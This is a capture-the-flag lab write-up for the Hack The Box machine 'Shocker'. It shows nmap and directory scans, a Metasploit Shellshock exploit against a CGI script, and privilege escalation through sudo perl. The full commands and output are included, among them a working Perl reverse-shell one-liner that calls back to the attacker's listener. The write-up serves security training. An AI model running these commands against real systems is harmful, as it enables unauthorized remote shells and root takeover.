👽Shocker Writeup
[Perl] [Injection] [Web]
Nmap
-sC: Performs a script scan using the default set of scripts
-sV: Probe open ports to determine service/version info
-O: Enable OS detection
-oA: Output in the three major formats at once
┌──(kali㉿kali)-[~/HTB/shocker]
└─$ sudo nmap -sC -sV -O -oA nmap_shocker 10.10.10.56 1 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-09 21:11 EST
Nmap scan report for 10.10.10.56
Host is up (0.014s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/9%OT=80%CT=1%CU=33684%PV=Y%DS=2%DC=I%G=Y%TM=61DB95F2
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M54BST11NW6%O2=M54BST11NW6%O3=M54BNNT11NW6%O4=M54BST11NW6%O5=M54BST11
OS:NW6%O6=M54BST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
OS:R=Y%DF=Y%T=40%W=7210%O=M54BNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.49 secondslWe are greeted by an image that looks like a very hostile bug when we visited the URL http://10.10.10.56/ on a web browser.
Gobuster
dir: Uses directory/file enumeration mode
-w: Path to the wordlist
-u: The target URL
-f: Append / to each request
-x: File extension(s) to search for
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 10.10.10.56 -f -x php,html┌──(kali㉿kali)-[~/HTB/shocker]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 10.10.10.56 -f -x php,html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
2022/01/10 00:00:15 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 137]
/cgi-bin/ (Status: 403) [Size: 294]
/icons/ (Status: 403) [Size: 292]Dirbuster
Fuzzing for the extension sh, py, pl using Dirbuster.
┌──(kali㉿kali)-[~/HTB/shocker]
└─$ dirbuster
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Starting OWASP DirBuster 1.0-RC1Input the following fields into the Dirbuster's GUI:
Target URL
File with list of dirs/files
File extension
Dir found: / - 200
Dir found: /cgi-bin/ - 403
Dir found: /icons/ - 403
File found: /cgi-bin/user.sh - 200Dirbuster managed to find the following shell script:
File found: /cgi-bin/user.sh - 200Google
https://httpd.apache.org/security/vulnerabilities_24.html appeared as one of the google search results using the search term 'Apache httpd 2.4.18 cgi-bin vulnerabilities'.
Msfconsole
┌──(kali㉿kali)-[~/HTB/shocker]
└─$ msfconsoleExecute the following to search for a module:
search apache cgi
msf6 > search apache cgi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/apache_normalize_path_rce 2021-05-10 excellent Yes Apache 2.4.49/2.4.50 Traversal RCE
1 auxiliary/scanner/http/apache_normalize_path 2021-05-10 normal No Apache 2.4.49/2.4.50 Traversal RCE scanner
2 exploit/linux/http/apache_druid_js_rce 2021-01-21 excellent Yes Apache Druid 0.20.0 Remote Command Execution
3 exploit/windows/http/tomcat_cgi_cmdlineargs 2019-04-10 excellent Yes Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
4 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
5 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
6 auxiliary/dos/http/apache_mod_isapi 2010-03-05 normal No Apache mod_isapi Dangling Pointer
7 exploit/windows/http/php_apache_request_headers_bof 2012-05-08 normal No PHP apache_request_headers Function Buffer Overflow
8 exploit/multi/http/tomcat_jsp_upload_bypass 2017-10-03 excellent Yes Tomcat RCE via JSP Upload Bypass
Interact with a module by name or index. For example info 8, use 8 or use exploit/multi/http/tomcat_jsp_upload_bypassThe module 'apache_mod_cgi_bash_env_exec' will be used.
4 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)Execute the following commands:
use 4
show options
msf6 > use 4
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options
Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD_MAX_LENGTH 2048 yes CMD max line length
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all a
ddresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI yes Path to CGI script
TIMEOUT 5 yes HTTP read response timeout (seconds)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.249.135 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux x86
Set the require options and run the exploit:
set LHOST 10.10.17.239
set RHOST 10.10.10.56
set TARGETURI /cgi-bin/user.sh
sf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set LHOST 10.10.17.239
LHOST => 10.10.17.239
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOST 10.10.10.56
RHOST => 10.10.10.56
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/user.sh
TARGETURI => /cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run
[*] Started reverse TCP handler on 10.10.17.239:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (984904 bytes) to 10.10.10.56
[*] Meterpreter session 1 opened (10.10.17.239:4444 -> 10.10.10.56:40956 ) at 2022-01-10 02:30:57 -0500
meterpreter >
ip a
Execute 'ip a' to find the local host IP address which is needed for the option 'LHOST' for the Metasploit module.
┌──(kali㉿kali)-[~/HTB/shocker]
└─$ ip a3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 500
link/none
inet 10.10.17.239/23 scope global tun0
valid_lft forever preferred_lft forever
inet6 dead:beef:4::11ed/64 scope global
valid_lft forever preferred_lft forever
inet6 fe80::d863:fab4:a02d:5afd/64 scope link stable-privacy
valid_lft forever preferred_lft foreverThe IP address for LHOST is 10.10.17.239.
inet 10.10.17.239/23 scope global tun0Meterpreter
Execute 'shell' command to gain a shell session.
meterpreter > shell
Process 1467 created.
Channel 1 created.Execute 'whoami'
whoami
shellyWe can use the find command to search for the .txt file that contains the flag for the user.
find /home -type f -name *.txt
/home/shelly/user.txt
cat /home/shelly/user.txt
2ec2****************************Sudo
-l: list user's privileges or check a specific command
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
The user Shelly is able to run Perl as root.
(root) NOPASSWD: /usr/bin/perlNetcat
Execute 'nc -lvnp 1234' to create a listener on another terminal.
┌──(kali㉿kali)-[~/HTB/shocker]
└─$ nc -lvnp 1234
listening on [any] 1234 ...Reverse Shell
We are able to get the Perl reverse shell code from https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Update $i to the local host IP address
$i:'"10.10.17.239"
Execute the following code in the Meterpreter session.
sudo perl -e 'use Socket;$i="10.10.17.239";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'Netcat
Head back to the the terminal where we executed the Netcat listener code.
┌──(kali㉿kali)-[~/HTB/shocker]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.17.239] from (UNKNOWN) [10.10.10.56] 41484
/bin/sh: 0: can't access tty; job control turned off
# Execute 'whoami'
# whoami
rootLet's find and cat the .txt file that contains the flag for root.
# find /root -type f -name *.txt
/root/root.txt
# cat /root/root.txt
52c2****************************
Last updated